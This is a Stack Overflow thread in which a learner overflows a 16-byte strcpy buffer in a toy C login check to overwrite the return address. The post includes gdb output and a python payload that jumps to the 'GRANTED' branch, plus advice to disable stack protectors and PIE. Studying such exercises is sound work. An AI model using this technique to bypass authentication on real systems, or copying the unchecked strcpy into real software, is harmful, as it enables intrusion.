# can't overwirte return address outside of gdb

Tags: c, gdb, overflow

I try to use a buffer overflow on the stack to 
redirect the return address. My goal is to overwrite the return address within the "check_auth" function, that the main continues at line 22 ("printf("GRANTED\n");"). Here is the C code:

```
fugi@calc:~/Desktop$ gcc -g auth_overflow.c -o auth_overflow
fugi@calc:~/Desktop$ gdb auth_overflow -q
Reading symbols from auth_overflow...done.
(gdb) list 1
1       #include <stdio.h>
2       #include <stdlib.h>
3       #include <string.h>
4   
5       int check_auth(char *pass){
6           char pass_buff[16];
7           int auth_flag = 0;
8           strcpy(pass_buff, pass);
9   
10          if(strcmp(pass_buff, "yes") == 0)
(gdb) 
11              auth_flag = 1;
12          return auth_flag; 
13      }
14  
15      int main( int argc, char *argv[]){
16          if(argc < 2){
17              printf("Usage: %s <password>\n\n", argv[0]);
18              exit(0);
19          }
20          if(check_auth(argv[1])){
(gdb) 
21              printf("ACCESS\n");
22              printf("GRANTED\n");
23          }
24          else{
25              printf("\n Access Denied\n");
26          }
27          return 0;
28      }
```

I am using gdb on a 64bit Debian system, to debug the code.
My problem is, the overwriting doesn't work outside of gdb.

I know, that the return address in which points back to main and the the beginning of the input variable(pass_buff) are 40 bytes appart.

```
 (gdb) i f 
 Stack level 0, frame at 0x7fffffffe170:
 rip = 0x55555555477d in check_auth (auth_overflow.c:8); saved rip = 0x555555554800
 called by frame at 0x7fffffffe190
 source language c.
 Arglist at 0x7fffffffe160, args: pass=0x7fffffffe562 'A' <repeats 56 times>
 Locals at 0x7fffffffe160, Previous frame's sp is 0x7fffffffe170
 Saved registers:
 rbp at 0x7fffffffe160, rip at 0x7fffffffe168
(gdb) x/x *0x7fffffffe168
0x55554800: Cannot access memory at address 0x55554800
(gdb) x/x pass_buff
0x7fffffffe140: 0x00000001
(gdb) p 0x7fffffffe168 - 0x7fffffffe140
$1 = 40
```

So, when I do this:

```
(gdb) run `python -c 'print("A"*40 + "\x10\x48\x55\x55\x55\x55")'`
Starting program: /home/fugi/Desktop/auth_overflow `python -c 'print("A"*40 + "\x10\x48\x55\x55\x55\x55")'`
GRANTED

Program received signal SIGBUS, Bus error.
main (argc=<error reading variable: Cannot access memory at address 0x414141414141413d>, 
argv=<error reading variable: Cannot access memory at address 0x4141414141414131>) at auth_overflow.c:28
28      }
```

But when I do it without gdb it doesn't work:

```
fugi@calc:~/Desktop$ ./auth_overflow `python -c 'print("A"*40 + "\x10\x48\x55\x55\x55\x55")'`
Segmentation fault
```

What can I do to make this work?

I also tried to do this by repeating the address, but the problem here is, that I can't print null bytes:

```
(gdb) x/12xg $rsp
0x7fffffffe130: 0x00007fffffffe156  0x00007fffffffe56c
0x7fffffffe140: 0x4141414141414141  0x4141414141414141
0x7fffffffe150: 0x4141414141414141  0x4141414141414141
0x7fffffffe160: 0x4141414141414141  **0x0000555555554810**
0x7fffffffe170: 0x00007fffffffe268  0x0000000200000000
0x7fffffffe180: 0x0000555555554840  0x00007ffff7a57561
```

to make the address fit I need to add \x00\x00 but then I get:

```
fugi@calc:~/Desktop$ ./auth_overflow `python -c 'print("A"*40 + "\x10\x48\x55\x55\x55\x55\x00\x00")'`
**bash: warning: command substitution: ignored null byte in input**
Segmentation fault
```

Is there a way to repeat the address like this?

Thanks for you help in advance

Comment: You ask SO how to be a hacker?

Comment: Come on @manni66 . You want this kid to learn in the back of a car?

Comment: There are non-deterministic factors when compiling/building the application. The existence of stack canaries can be disabled with `-fno-stack-protector` and Positionally Independent Executable support for ASLR can be disabled with `-no-pie`. The stack is, by default, generally not executable. You must add `-zexecstack` if you would like to execute shellcode directly from the stack. If not, you're going to have to use Return Oriented Programming (sometimes called Ret2Ret), Ret2Libc, or any number of other avenues. Source: I read the Shellcoder's Handbook in the back of my mom's Toyota corolla.

Answer (score 2):

I don't know about exact build settings in your development environment, but I can guess some problems.

- on current Linux environment, PIE (Position-Independent-Executive) is enabled. which means, your target address is not always `0x0000555555554810`. to check that, add this code to main function :

  ```
  printf("CODE: %p\n", (void*)main);
  ```

  if this code generates same address every times, then PIE is disabled.
- `argv` argument cannot include NULL byte (except end of string). but this is not a critical problem because on x86-64 system they uses only 6 low bytes for virtual address.

to disable PIE build : *use -no-pie*. `gcc main.c -o main -no-pie`

Comment: Thanks a lot, you saved my day j31d0. You where right, PIE wasn't enabled. Overflows would be much more fun, if we hadn't all this security features to protect code ;D

Answer (score 0):

If you're asking how to return check_auth(), I'd do this:

```
int main( int argc, char *argv[]){
    if(argc < 2){
        printf("Usage: %s <password>\n\n", argv[0]);
        exit(0);
    }

    int flag = check_auth(argv[1]);

    if(flag){

        printf("ACCESS\n");
        printf("GRANTED\n");
    }else{
        printf("\n Access Denied\n");
    }
    return flag;
}
```

My main language is Java, actually, so if I'm wrong, please correct me. I'm trying to learn C as we speak.